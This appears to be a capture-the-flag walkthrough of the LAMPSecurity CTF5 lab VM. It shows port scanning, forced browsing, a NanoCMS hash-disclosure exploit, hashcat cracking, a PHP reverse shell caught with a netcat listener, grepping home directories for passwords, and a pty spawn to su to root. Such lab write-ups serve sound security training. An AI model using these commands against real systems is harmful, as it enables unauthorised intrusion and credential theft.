Dhruv Ambaliya
- Author Description
- Enumeration
- Web Application Enumeration
- Hashcat md5 cracking
- Web Application Exploitation
- Linux Local Enumeration
- Local Privilege Escalation
Author Description
The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products.
Author: madirish2600
Download: VulnHub via @VulnHub
Enumeration
Host Service Enumeration
nmap -v -p 1-65535 -sV -O -sT 192.168.30.130Dislcaimer: Multiple Entry Points
The LAMPSecurity series is not particularly challenging, for each VM in the series I've targeted the web application as the entry point.
| Port | Service | Version Detection |
|---|---|---|
|
|
SSH |
OpenSSH 4.7 (protocol 2.0) |
|
|
SMTP |
Sendmail 8.14.1/8.14.1 |
|
|
HTTPD |
Apache httpd 2.2.6 ((Fedora)) |
|
|
POP3 |
ipop3d 2006k.101 |
|
|
rpcbind |
N/A |
|
|
netbios-ssn |
Samba smbd 3.X |
|
|
IMAP |
University of Washington IMAP imapd |
|
|
netbios-ssn |
Samba smbd 3.X (workgroup: MYGROUP) |
|
|
HTTP |
Samba SWAT administration server |
|
|
MySQL |
MySQL 5.0.45 |
|
|
RPC |
RPC |
|
|
RPC |
RPC |
HTTP Enumeration
Inspection of the Web Application revealed the blog used a URL path of /~andy/, indicating it was serving an Apache home dir - username enumeration is possible. Further inspection of the web application indicated the use of GET requests /?page=contact,
Forced Browsing
Dirbuster revealed the directory /~andy/data/nanoadmin.php,
indicating the site used NanoCMS (this was confirmed by viewing the page
source code).
Web Application Enumeration
Viewing the web application disclosed the application used “NanoCMS”, this information was also previously discovered using Dirbuster. Research indicated a NanoCMS vulnerability existed that disclosed the applications password hashes. http://www.securityfocus.com/bid/34508/exploit
Hash Disclosure
Admin hases were successfully retrived using the discovered NanoCMS exploit:
Verified Hash Type
Hash Identifier was used to confirm the hash was md5.
Hashcat md5 cracking
Hashcat was used to crack the hash.
# hashcat -m 0 -a 0 ctf5-hash.txt /usr/share/wordlists/rockyou.txtDiscovered password: 9d2f75377ac0ab991d40c91fd27e52fd:shannon
Web Application Exploitation
Authentication was successful using the previously cracked hash credential. I new page was created containing php reverse shell code:
A netcat reverse handler was setup nc -n -v -l -p 443, the shell
successfully connected back.
Linux Local Enumeration
Enumeration indicated /home/ directories were readable.
Grep’ing for the string password discovered the following:
sh-3.2$ grep -R -i password /home/*
Discovered the file:
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note: <title>Root
password</title>
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note: <text
xml:space="preserve"><note-content version="0.1">Root password
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:Root passwordThe file contained the root credentials.
| Username | Password |
|---|---|
|
|
50$cent |
Local Privilege Escalation
sh-3.2$ su -
standard in must be a tty
sh-3.2$ python -c 'import pty;pty.spawn("/bin/sh")'
bash-3.2$ su -
su -
Password: 50$cent
[root@localhost ~]# whoami
whoami
root
[root@localhost ~]# id
id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
context=system_u:system_r:httpd_t:s0Thanks for the VM :)